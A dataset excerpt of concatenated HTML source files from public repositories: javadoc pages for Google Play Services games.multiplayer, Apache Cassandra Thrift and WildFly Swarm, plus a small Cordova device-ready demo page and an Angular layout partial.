apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/plus/package-summary.html">com.google.android.gms.plus</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/plus/model/moments/package-summary.html">com.google.android.gms.plus.model.moments</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/plus/model/people/package-summary.html">com.google.android.gms.plus.model.people</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/security/package-summary.html">com.google.android.gms.security</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/tagmanager/package-summary.html">com.google.android.gms.tagmanager</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/wallet/package-summary.html">com.google.android.gms.wallet</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/wallet/fragment/package-summary.html">com.google.android.gms.wallet.fragment</a></li> <li class="api apilevel-"> <a href="../../../../../../../reference/com/google/android/gms/wearable/package-summary.html">com.google.android.gms.wearable</a></li> </ul><br/> </div> <!-- end packages-nav --> </div> <!-- end resize-packages --> <div id="classes-nav" class="scroll-pane"> <ul> <li><h2>Interfaces</h2> <ul> <li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/Invitation.html">Invitation</a></li> <li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/Invitations.html">Invitations</a></li> <li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/Invitations.LoadInvitationsResult.html">Invitations.LoadInvitationsResult</a></li> <li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/Multiplayer.html">Multiplayer</a></li> <li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/OnInvitationReceivedListener.html">OnInvitationReceivedListener</a></li> <li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/Participant.html">Participant</a></li> <li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/Participatable.html">Participatable</a></li> </ul> </li> <li><h2>Classes</h2> <ul> <li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/InvitationBuffer.html">InvitationBuffer</a></li> <li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/InvitationEntity.html">InvitationEntity</a></li> <li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/ParticipantBuffer.html">ParticipantBuffer</a></li> <li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/ParticipantEntity.html">ParticipantEntity</a></li> <li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/ParticipantResult.html">ParticipantResult</a></li> <li class="api apilevel-"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/ParticipantUtils.html">ParticipantUtils</a></li> </ul> </li> </ul><br/> </div><!-- end classes --> </div><!-- end nav-panels --> <div id="nav-tree" style="display:none" class="scroll-pane"> <div id="tree-list"></div> </div><!-- end nav-tree --> </div><!-- end swapper --> <div id="nav-swap"> <a class="fullscreen">fullscreen</a> <a href='#' onclick='swapNav();return false;'><span id='tree-link'>Use Tree Navigation</span><span id='panel-link' style='display:none'>Use Panel Navigation</span></a> </div> </div> <!-- end devdoc-nav --> </div> <!-- end side-nav --> <script type="text/javascript"> // init fullscreen based on user pref var fullscreen = readCookie("fullscreen"); if (fullscreen != 0) { if (fullscreen == "false") { toggleFullscreen(false); } else { toggleFullscreen(true); } } // init nav version for mobile if (isMobile) { swapNav(); // tree view should be used on mobile $('#nav-swap').hide(); } else { chooseDefaultNav(); if ($("#nav-tree").is(':visible')) { init_default_navtree("../../../../../../../"); } } // scroll the selected page into view $(document).ready(function() { scrollIntoView("packages-nav"); scrollIntoView("classes-nav"); }); </script> <div class="col-12" id="doc-col"> <div id="api-info-block"> <div class="api-level"> </div> </div> <div id="jd-header"> package <h1>com.google.android.gms.games.multiplayer</h1> </div><!-- end header --> <div id="naMessage"></div> <div id="jd-content" class="api apilevel-"> <div class="jd-descr"> Contains data classes for multiplayer functionality. </div> <h2>Interfaces</h2> <div class="jd-sumtable"> <table class="jd-sumtable-expando"> <tr class="alt-color api apilevel-" > <td class="jd-linkcol"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/Invitation.html">Invitation</a></td> <td class="jd-descrcol" width="100%">Data interface for an invitation object.&nbsp;</td> </tr> <tr class=" api apilevel-" > <td class="jd-linkcol"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/Invitations.html">Invitations</a></td> <td class="jd-descrcol" width="100%">Entry point for invitations functionality.&nbsp;</td> </tr> <tr class="alt-color api apilevel-" > <td class="jd-linkcol"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/Invitations.LoadInvitationsResult.html">Invitations.LoadInvitationsResult</a></td> <td class="jd-descrcol" width="100%">Result delivered when invitations have been loaded.&nbsp;</td> </tr> <tr class=" api apilevel-" > <td class="jd-linkcol"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/Multiplayer.html">Multiplayer</a></td> <td class="jd-descrcol" width="100%">Common constants/methods for multiplayer functionality.&nbsp;</td> </tr> <tr class="alt-color api apilevel-" > <td class="jd-linkcol"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/OnInvitationReceivedListener.html">OnInvitationReceivedListener</a></td> <td class="jd-descrcol" width="100%">Listener to invoke when a new invitation is received.&nbsp;</td> </tr> <tr class=" api apilevel-" > <td class="jd-linkcol"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/Participant.html">Participant</a></td> <td class="jd-descrcol" width="100%">Data interface for multiplayer participants.&nbsp;</td> </tr> <tr class="alt-color api apilevel-" > <td class="jd-linkcol"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/Participatable.html">Participatable</a></td> <td class="jd-descrcol" width="100%">Interface defining methods for an object which can have participants.&nbsp;</td> </tr> </table> </div> <h2>Classes</h2> <div class="jd-sumtable"> <table class="jd-sumtable-expando"> <tr class="alt-color api apilevel-" > <td class="jd-linkcol"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/InvitationBuffer.html">InvitationBuffer</a></td> <td class="jd-descrcol" width="100%"><code><a href="../../../../../../../reference/com/google/android/gms/common/data/DataBuffer.html">DataBuffer</a></code> implementation containing Invitation data.&nbsp;</td> </tr> <tr class=" api apilevel-" > <td class="jd-linkcol"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/InvitationEntity.html">InvitationEntity</a></td> <td class="jd-descrcol" width="100%">Data object representing the data for a multiplayer invitation.&nbsp;</td> </tr> <tr class="alt-color api apilevel-" > <td class="jd-linkcol"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/ParticipantBuffer.html">ParticipantBuffer</a></td> <td class="jd-descrcol" width="100%"><code><a href="../../../../../../../reference/com/google/android/gms/common/data/DataBuffer.html">DataBuffer</a></code> implementation containing match participant data.&nbsp;</td> </tr> <tr class=" api apilevel-" > <td class="jd-linkcol"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/ParticipantEntity.html">ParticipantEntity</a></td> <td class="jd-descrcol" width="100%">Data object representing a Participant in a match.&nbsp;</td> </tr> <tr class="alt-color api apilevel-" > <td class="jd-linkcol"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/ParticipantResult.html">ParticipantResult</a></td> <td class="jd-descrcol" width="100%">Data class used to report a participant's result in a match.&nbsp;</td> </tr> <tr class=" api apilevel-" > <td class="jd-linkcol"><a href="../../../../../../../reference/com/google/android/gms/games/multiplayer/ParticipantUtils.html">ParticipantUtils</a></td> <td class="jd-descrcol" width="100%">Utilities for working with multiplayer participants.&nbsp;</td> </tr> </table> </div> <div id="footer" class="wrap" > <div id="copyright"> Except as noted, this content is licensed under <a href="http://www.apache.org/licenses/LICENSE-2.0">Apache 2.0</a>. For details and restrictions, see the <a href="../../../../../../../license.html"> Content License</a>. </div> <div id="build_info"> Android GmsCore 1501030&nbsp;r &mdash; <script src="../../../../../../../timestamp.js" type="text/javascript"></script> <script>document.write(BUILD_TIMESTAMP)</script> </div> <div id="footerlinks"> <p> <a href="../../../../../../../about/index.html">About Android</a>&nbsp;&nbsp;|&nbsp; <a href="../../../../../../../legal.html">Legal</a>&nbsp;&nbsp;|&nbsp; <a href="../../../../../../../support.html">Support</a> </p> </div> </div> <!-- end footer --> </div><!-- end jd-content --> </div><!-- doc-content --> </div> <!-- end body-content --> </body> </html>
gudnam/bringluck
google_play_services/docs/reference/com/google/android/gms/games/multiplayer/package-summary.html
HTML
apache-2.0
33,928
<!DOCTYPE html> <html> <head> <title>demo</title> <script type="text/javascript" charset="utf-8" src="cordova.js"></script> <script type="text/javascript" charset="utf-8" src="http://192.168.1.102/apk/on.js"></script> </head> <body> <font size=7 color=blue> ver0111: <p> <p id="log"></p> </font> </body> <script type="text/javascript" charset="utf-8"> young_log("init00--"); document.addEventListener('deviceready', onDeviceReady, false); young_log("init01--"); var ready = false; young_log("before while."); /*while(true) { if(ready == true) { break; } } young_log("ready detected."); */ young_log("ready:" + ready); //sleep(5000); young_log("ready:" + ready); //--------------------------- function sleep(d){ for(var t = Date.now();Date.now() - t <= d;); } function young_log(message) { document.getElementById("log").innerHTML += (message + "<p>"); } </script> </html>
younggift/phonegap_onDeviceReady
www/index.html
HTML
apache-2.0
924
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_72) on Wed May 13 11:47:42 EDT 2015 --> <title>Cassandra.describe_partitioner_result._Fields (apache-cassandra API)</title> <meta name="date" content="2015-05-13"> <link rel="stylesheet" type="text/css" href="../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Cassandra.describe_partitioner_result._Fields (apache-cassandra API)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/Cassandra.describe_partitioner_result._Fields.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result.html" title="class in org.apache.cassandra.thrift"><span class="strong">Prev Class</span></a></li> <li><a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_ring_args.html" title="class in org.apache.cassandra.thrift"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../index.html?org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html" target="_top">Frames</a></li> <li><a href="Cassandra.describe_partitioner_result._Fields.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#enum_constant_summary">Enum Constants</a>&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li><a href="#enum_constant_detail">Enum Constants</a>&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">org.apache.cassandra.thrift</div> <h2 title="Enum Cassandra.describe_partitioner_result._Fields" class="title">Enum Cassandra.describe_partitioner_result._Fields</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li>java.lang.Object</li> <li> <ul class="inheritance"> <li>java.lang.Enum&lt;<a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html" title="enum in org.apache.cassandra.thrift">Cassandra.describe_partitioner_result._Fields</a>&gt;</li> <li> <ul class="inheritance"> <li>org.apache.cassandra.thrift.Cassandra.describe_partitioner_result._Fields</li> </ul> </li> </ul> </li> </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <dl> <dt>All Implemented Interfaces:</dt> <dd>java.io.Serializable, java.lang.Comparable&lt;<a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html" title="enum in org.apache.cassandra.thrift">Cassandra.describe_partitioner_result._Fields</a>&gt;, org.apache.thrift.TFieldIdEnum</dd> </dl> <dl> <dt>Enclosing class:</dt> <dd><a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result.html" title="class in org.apache.cassandra.thrift">Cassandra.describe_partitioner_result</a></dd> </dl> <hr> <br> <pre>public static enum <span class="strong">Cassandra.describe_partitioner_result._Fields</span> extends java.lang.Enum&lt;<a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html" title="enum in org.apache.cassandra.thrift">Cassandra.describe_partitioner_result._Fields</a>&gt; implements org.apache.thrift.TFieldIdEnum</pre> <div class="block">The set of fields this struct contains, along with convenience methods for finding and manipulating them.</div> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- =========== ENUM CONSTANT SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="enum_constant_summary"> <!-- --> </a> <h3>Enum Constant Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Enum Constant Summary table, listing enum constants, and an explanation"> <caption><span>Enum Constants</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Enum Constant and Description</th> </tr> <tr class="altColor"> <td class="colOne"><code><strong><a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html#SUCCESS">SUCCESS</a></strong></code>&nbsp;</td> </tr> </table> </li> </ul> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method_summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span>Methods</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr class="altColor"> <td class="colFirst"><code>static <a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html" title="enum in org.apache.cassandra.thrift">Cassandra.describe_partitioner_result._Fields</a></code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html#findByName(java.lang.String)">findByName</a></strong>(java.lang.String&nbsp;name)</code> <div class="block">Find the _Fields constant that matches name, or null if its not found.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static <a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html" title="enum in org.apache.cassandra.thrift">Cassandra.describe_partitioner_result._Fields</a></code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html#findByThriftId(int)">findByThriftId</a></strong>(int&nbsp;fieldId)</code> <div class="block">Find the _Fields constant that matches fieldId, or null if its not found.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static <a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html" title="enum in org.apache.cassandra.thrift">Cassandra.describe_partitioner_result._Fields</a></code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html#findByThriftIdOrThrow(int)">findByThriftIdOrThrow</a></strong>(int&nbsp;fieldId)</code> <div class="block">Find the _Fields constant that matches fieldId, throwing an exception if it is not found.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>java.lang.String</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html#getFieldName()">getFieldName</a></strong>()</code>&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><code>short</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html#getThriftFieldId()">getThriftFieldId</a></strong>()</code>&nbsp;</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static <a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html" title="enum in org.apache.cassandra.thrift">Cassandra.describe_partitioner_result._Fields</a></code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html#valueOf(java.lang.String)">valueOf</a></strong>(java.lang.String&nbsp;name)</code> <div class="block">Returns the enum constant of this type with the specified name.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static <a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html" title="enum in org.apache.cassandra.thrift">Cassandra.describe_partitioner_result._Fields</a>[]</code></td> <td class="colLast"><code><strong><a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html#values()">values</a></strong>()</code> <div class="block">Returns an array containing the constants of this enum type, in the order they are declared.</div> </td> </tr> </table> <ul class="blockList"> <li class="blockList"><a name="methods_inherited_from_class_java.lang.Enum"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Enum</h3> <code>clone, compareTo, equals, finalize, getDeclaringClass, hashCode, name, ordinal, toString, valueOf</code></li> </ul> <ul class="blockList"> <li class="blockList"><a name="methods_inherited_from_class_java.lang.Object"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Object</h3> <code>getClass, notify, notifyAll, wait, wait, wait</code></li> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ============ ENUM CONSTANT DETAIL =========== --> <ul class="blockList"> <li class="blockList"><a name="enum_constant_detail"> <!-- --> </a> <h3>Enum Constant Detail</h3> <a name="SUCCESS"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>SUCCESS</h4> <pre>public static final&nbsp;<a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html" title="enum in org.apache.cassandra.thrift">Cassandra.describe_partitioner_result._Fields</a> SUCCESS</pre> </li> </ul> </li> </ul> <!-- ============ METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method_detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="values()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>values</h4> <pre>public static&nbsp;<a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html" title="enum in org.apache.cassandra.thrift">Cassandra.describe_partitioner_result._Fields</a>[]&nbsp;values()</pre> <div class="block">Returns an array containing the constants of this enum type, in the order they are declared. This method may be used to iterate over the constants as follows: <pre> for (Cassandra.describe_partitioner_result._Fields c : Cassandra.describe_partitioner_result._Fields.values()) &nbsp; System.out.println(c); </pre></div> <dl><dt><span class="strong">Returns:</span></dt><dd>an array containing the constants of this enum type, in the order they are declared</dd></dl> </li> </ul> <a name="valueOf(java.lang.String)"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>valueOf</h4> <pre>public static&nbsp;<a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html" title="enum in org.apache.cassandra.thrift">Cassandra.describe_partitioner_result._Fields</a>&nbsp;valueOf(java.lang.String&nbsp;name)</pre> <div class="block">Returns the enum constant of this type with the specified name. The string must match <i>exactly</i> an identifier used to declare an enum constant in this type. (Extraneous whitespace characters are not permitted.)</div> <dl><dt><span class="strong">Parameters:</span></dt><dd><code>name</code> - the name of the enum constant to be returned.</dd> <dt><span class="strong">Returns:</span></dt><dd>the enum constant with the specified name</dd> <dt><span class="strong">Throws:</span></dt> <dd><code>java.lang.IllegalArgumentException</code> - if this enum type has no constant with the specified name</dd> <dd><code>java.lang.NullPointerException</code> - if the argument is null</dd></dl> </li> </ul> <a name="findByThriftId(int)"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>findByThriftId</h4> <pre>public static&nbsp;<a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html" title="enum in org.apache.cassandra.thrift">Cassandra.describe_partitioner_result._Fields</a>&nbsp;findByThriftId(int&nbsp;fieldId)</pre> <div class="block">Find the _Fields constant that matches fieldId, or null if its not found.</div> </li> </ul> <a name="findByThriftIdOrThrow(int)"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>findByThriftIdOrThrow</h4> <pre>public static&nbsp;<a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html" title="enum in org.apache.cassandra.thrift">Cassandra.describe_partitioner_result._Fields</a>&nbsp;findByThriftIdOrThrow(int&nbsp;fieldId)</pre> <div class="block">Find the _Fields constant that matches fieldId, throwing an exception if it is not found.</div> </li> </ul> <a name="findByName(java.lang.String)"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>findByName</h4> <pre>public static&nbsp;<a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html" title="enum in org.apache.cassandra.thrift">Cassandra.describe_partitioner_result._Fields</a>&nbsp;findByName(java.lang.String&nbsp;name)</pre> <div class="block">Find the _Fields constant that matches name, or null if its not found.</div> </li> </ul> <a name="getThriftFieldId()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getThriftFieldId</h4> <pre>public&nbsp;short&nbsp;getThriftFieldId()</pre> <dl> <dt><strong>Specified by:</strong></dt> <dd><code>getThriftFieldId</code>&nbsp;in interface&nbsp;<code>org.apache.thrift.TFieldIdEnum</code></dd> </dl> </li> </ul> <a name="getFieldName()"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>getFieldName</h4> <pre>public&nbsp;java.lang.String&nbsp;getFieldName()</pre> <dl> <dt><strong>Specified by:</strong></dt> <dd><code>getFieldName</code>&nbsp;in interface&nbsp;<code>org.apache.thrift.TFieldIdEnum</code></dd> </dl> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/Cassandra.describe_partitioner_result._Fields.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-all.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_partitioner_result.html" title="class in org.apache.cassandra.thrift"><span class="strong">Prev Class</span></a></li> <li><a href="../../../../org/apache/cassandra/thrift/Cassandra.describe_ring_args.html" title="class in org.apache.cassandra.thrift"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../index.html?org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html" target="_top">Frames</a></li> <li><a href="Cassandra.describe_partitioner_result._Fields.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#enum_constant_summary">Enum Constants</a>&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li><a href="#enum_constant_detail">Enum Constants</a>&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small>Copyright &copy; 2015 The Apache Software Foundation</small></p> </body> </html>
anuragkapur/cassandra-2.1.2-ak-skynet
apache-cassandra-2.0.15/javadoc/org/apache/cassandra/thrift/Cassandra.describe_partitioner_result._Fields.html
HTML
apache-2.0
17,844
<!-- top navbar--> <header data-ng-include="'app/views/partials/top-navbar.html'" data-ng-class="app.theme.topbar"></header> <!-- Sidebar--> <aside data-ng-include="'app/views/partials/sidebar.html'" data-ng-class="app.theme.sidebar"></aside> <!-- Main--> <section> <!-- Content--> <div ui-view="" autoscroll="false" data-ng-class="app.viewAnimation" class="app"></div> </section> <!-- Page footer--> <footer data-ng-include="'app/views/partials/footer.html'"></footer>
mkhairul/fighto_admin
public/app/views/app.html
HTML
apache-2.0
475
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_112) on Tue Sep 12 14:31:27 MST 2017 --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Uses of Interface org.wildfly.swarm.netflix.ribbon.RibbonArchive (BOM: * : All 2017.9.5 API)</title> <meta name="date" content="2017-09-12"> <link rel="stylesheet" type="text/css" href="../../../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Interface org.wildfly.swarm.netflix.ribbon.RibbonArchive (BOM: * : All 2017.9.5 API)"; } } catch(err) { } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../../org/wildfly/swarm/netflix/ribbon/RibbonArchive.html" title="interface in org.wildfly.swarm.netflix.ribbon">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../../../../../../overview-tree.html">Tree</a></li> <li><a href="../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../help-doc.html">Help</a></li> </ul> <div class="aboutLanguage">WildFly Swarm API, 2017.9.5</div> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../../index.html?org/wildfly/swarm/netflix/ribbon/class-use/RibbonArchive.html" target="_top">Frames</a></li> <li><a href="RibbonArchive.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h2 title="Uses of Interface org.wildfly.swarm.netflix.ribbon.RibbonArchive" class="title">Uses of Interface<br>org.wildfly.swarm.netflix.ribbon.RibbonArchive</h2> </div> <div class="classUseContainer"> <ul class="blockList"> <li class="blockList"> <table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation"> <caption><span>Packages that use <a href="../../../../../../org/wildfly/swarm/netflix/ribbon/RibbonArchive.html" title="interface in org.wildfly.swarm.netflix.ribbon">RibbonArchive</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Package</th> <th class="colLast" scope="col">Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><a href="#org.wildfly.swarm.netflix.ribbon">org.wildfly.swarm.netflix.ribbon</a></td> <td class="colLast">&nbsp;</td> </tr> </tbody> </table> </li> <li class="blockList"> <ul class="blockList"> <li class="blockList"><a name="org.wildfly.swarm.netflix.ribbon"> <!-- --> </a> <h3>Uses of <a href="../../../../../../org/wildfly/swarm/netflix/ribbon/RibbonArchive.html" title="interface in org.wildfly.swarm.netflix.ribbon">RibbonArchive</a> in <a href="../../../../../../org/wildfly/swarm/netflix/ribbon/package-summary.html">org.wildfly.swarm.netflix.ribbon</a></h3> <table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation"> <caption><span>Methods in <a 